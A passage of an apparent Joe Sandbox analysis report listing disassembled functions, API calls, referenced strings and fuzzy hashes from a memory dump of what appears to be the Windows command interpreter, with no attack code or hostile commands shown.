Part of subcall function 00007FF683F806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F8074D
Part of subcall function 00007FF683F806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F80762

_wcsicmp.MSVCRT ref: 00007FF683F825CA
_wcsicmp.MSVCRT ref: 00007FF683F825E8
_wcsicmp.MSVCRT ref: 00007FF683F8260F
_wcsicmp.MSVCRT ref: 00007FF683F82636
_wcsicmp.MSVCRT ref: 00007FF683F82650

Strings

ERRORLEVEL, xrefs: 00007FF683F825C3
CMDEXTVERSION, xrefs: 00007FF683F82608
NOT, xrefs: 00007FF683F82649
DEFINED, xrefs: 00007FF683F8262F
EXIST, xrefs: 00007FF683F825E1

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmp$Heap$AllocProcess
String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
API String ID: 3407644289-1668778490
Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
Instruction ID: 047ccb9f3ba4f7946f5bd88d0d0d53811c336c768314919632d6c8f2c8e7661b
Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
Instruction Fuzzy Hash: B6313B21A58542D6FB186F22E8132796AA5BF84B85F4C803DDA0EE72A5DE3CE400C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F87E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

iswspace.MSVCRT ref: 00007FF683F87EEE

Strings

A, xrefs: 00007FF683F901B6

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heapiswspace$AllocProcess
String ID: A
API String ID: 3731854180-3554254475
Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
Instruction ID: e54813d2c211502b40295f161696bee3c13c370ffb5de08df696559928d56906
Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
Instruction Fuzzy Hash: D2A1A161909682C6EB649F12A842279B7A0FF45790F0C803DDA5DEB7A4DF3CE445CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON

Download Yara Rule

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9A5DC

Part of subcall function 00007FF683F9A8D4: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9A8F1

SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9A62E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F9A68B
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F9A6A0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F9A6DE
RtlFreeHeap.NTDLL ref: 00007FF683F9A6F2
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F9A701

Strings

PE, xrefs: 00007FF683F9A65C

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
String ID: PE
API String ID: 2941894976-4258593460
Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
Instruction ID: 504b6e2fc539623956a727f8449b3b6670bdde3f01125f3f41df8c5d93a883c6
Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
Instruction Fuzzy Hash: C8417221608692C6EF209F12E41227AB7A0FF89B95F484239DE9D93B95DF3CE445CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F87610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F8768B
memset.MSVCRT ref: 00007FF683F876B4

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F877F5
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F87815

Part of subcall function 00007FF683F88198: wcscmp.MSVCRT ref: 00007FF683F881EA
Part of subcall function 00007FF683F88198: wcscmp.MSVCRT ref: 00007FF683F881FD

Strings

%s, xrefs: 00007FF683F8FC14

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$wcscmp
String ID: %s
API String ID: 243296809-3043279178
Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
Instruction ID: 145a83e6acbfb293710449a7154fdc7ccb9ceaad9783c5e4f78e0cb515e639d1
Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
Instruction Fuzzy Hash: B8A17022749786D6EB69DB22D8423FD27A0FF48748F184139DA4D9B695DF3CE648C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F799F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

wcschr.MSVCRT ref: 00007FF683F79A39

Part of subcall function 00007FF683F7DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF683F7CEAA), ref: 00007FF683F7DFB8
Part of subcall function 00007FF683F7DF60: RtlFreeHeap.NTDLL ref: 00007FF683F7DFCC
Part of subcall function 00007FF683F7DF60: _setjmp.MSVCRT ref: 00007FF683F7E03E

wcschr.MSVCRT ref: 00007FF683F79AF0
wcschr.MSVCRT ref: 00007FF683F79B0F

Part of subcall function 00007FF683F796E8: memset.MSVCRT ref: 00007FF683F797B2
Part of subcall function 00007FF683F796E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F79880

_wcsupr.MSVCRT ref: 00007FF683F8B844
wcscmp.MSVCRT ref: 00007FF683F8B86D

Strings

FOR, xrefs: 00007FF683F8B863
IF, xrefs: 00007FF683F8B850

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
String ID: FOR$ IF
API String ID: 557945885-2924197646
Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
Instruction ID: b41973339f8d04985eafc05cce405603f7294f63c4e98e37e347a15c2914ec16
Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
Instruction Fuzzy Hash: D8518D20B0AA87C5FE18AB16955617A26A1FF49B94F4C463DD91EB77D1DF3CE802C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00007FF683F7F0D6
iswspace.MSVCRT ref: 00007FF683F7F1BA
wcschr.MSVCRT ref: 00007FF683F7F1E7
iswdigit.MSVCRT ref: 00007FF683F7F1FF
iswdigit.MSVCRT ref: 00007FF683F7F2BB

Strings

), xrefs: 00007FF683F7F18C
=,;, xrefs: 00007FF683F7F1CE

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswdigit$iswspacewcschr
String ID: )$=,;
API String ID: 1959970872-2167043656
Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
Instruction ID: 0ee32e89c87e697308430c52e013c4cb8ca425f5d05bbe50ed11dcf49361b18d
Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
Instruction Fuzzy Hash: 63418E61E0879AC6FBA48B15E94637966F0BF10795F8C503EC98DE32A0DF3CA481C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

iswalpha.MSVCRT ref: 00007FF683F9BABA
towupper.MSVCRT ref: 00007FF683F9BAD1
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9BB13
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9BB2F
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9BB48

Strings

:, xrefs: 00007FF683F9BAAF
%04X-%04X, xrefs: 00007FF683F9BBBB

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorLast$InformationVolumeiswalphatowupper
String ID: %04X-%04X$:
API String ID: 930873262-1938371929
Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
Instruction ID: 9542d4a28adfa0a38fe78ae603b3c9ef8ba54f9cff9e2be9da51a73f766f701e
Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
Instruction Fuzzy Hash: DF418431A0CA82D2EB249F51E4522BAB3A0FF84755F48413ADA4EA37D5DF3CD945C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F86A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00007FF683F86A73
wcschr.MSVCRT ref: 00007FF683F86A91
wcschr.MSVCRT ref: 00007FF683F86AB0
wcschr.MSVCRT ref: 00007FF683F86AE3
wcschr.MSVCRT ref: 00007FF683F86B01

Strings

<>+-*/%()|^&=,, xrefs: 00007FF683F86A8A, 00007FF683F86AF7
+-~!, xrefs: 00007FF683F86AA9, 00007FF683F86ADC

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$iswdigit
String ID: +-~!$<>+-*/%()|^&=,
API String ID: 2770779731-632268628
Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
Instruction ID: a79f32a60ebbd46be431ab7bb5c6a4a2757da0ca916808e89f9557405e5861ff
Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
Instruction Fuzzy Hash: 73311B22A49A56C5EB549F06E8512B977E0FF49F89B4D813ADB6EA3354EF3CE404C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F81630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F81673
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F8168D
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F81757
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F8176E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F81788
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F8179C

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$Process$Alloc$Size
String ID:
API String ID: 3586862581-0
Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
Instruction ID: 9249832f3f2ee2528ded559e08de2902157d61ddeeed5376b38418c1f3f844ff
Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
Instruction Fuzzy Hash: 00919061A59746C2EB188F1AE44227877A0FF44B94F5D8639EE4DA77A0DF3CE441C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 00007FF683F7F1BA
wcschr.MSVCRT ref: 00007FF683F7F1E7
iswdigit.MSVCRT ref: 00007FF683F7F1FF
iswdigit.MSVCRT ref: 00007FF683F7F2BB

Strings

), xrefs: 00007FF683F7F18C
=,;, xrefs: 00007FF683F7F1CE

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswdigit$iswspacewcschr
String ID: )$=,;
API String ID: 1959970872-2167043656
Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
Instruction ID: 6f1d271d24deb3f330d3ef1f620a34fbbcc3d49cabb99b2fb6501f814fc3a19e
Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
Instruction Fuzzy Hash: 9F4138A5E0879BC6FBA48B15D95A27926F0BF10795F9C503EC98DE32A4CF3CA441C6C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F991B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF683F991FF
wcsrchr.MSVCRT ref: 00007FF683F99232
_wcsnicmp.MSVCRT ref: 00007FF683F99285

Strings

CMD Internal Error %s, xrefs: 00007FF683F991F8
%s, xrefs: 00007FF683F99298
Null environment, xrefs: 00007FF683F991F1

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsnicmpfprintfwcsrchr
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 3625580822-2781220306
Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
Instruction ID: 76ba284800a23b501e32aae25491e66492df5b3a1c4e9aecfd765d0ac4732cc6
Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
Instruction Fuzzy Hash: 3E31F221A08686D2FA549F42A5021BA72A0BF45B94F4D4139DD1DBB7E1EF3CE485C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F75984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F93687
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF683F7260D), ref: 00007FF683F936A6
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF683F7260D), ref: 00007FF683F936EB
_get_osfhandle.MSVCRT ref: 00007FF683F93703
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF683F7260D), ref: 00007FF683F93722

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$Write_get_osfhandle$Mode
String ID:
API String ID: 1066134489-0
Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
Instruction ID: f9bb77d361fe84d62fe57b5301cdbaa8ff98811081bd3b0bb7325086de44816f
Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
Instruction Fuzzy Hash: D5519062B08642D7EE645F25A90697AA7A1FF44B94F0C443EDE0EA7790DF3CE440CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

_wcsicmp.MSVCRT ref: 00007FF683F9BE98
_wcsicmp.MSVCRT ref: 00007FF683F9BEC5
_wcsicmp.MSVCRT ref: 00007FF683F9BEFA

Strings

LIST, xrefs: 00007FF683F9BEF0
OFF, xrefs: 00007FF683F9BEBB, 00007FF683F9BEDB
KEYS, xrefs: 00007FF683F9BEE2

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
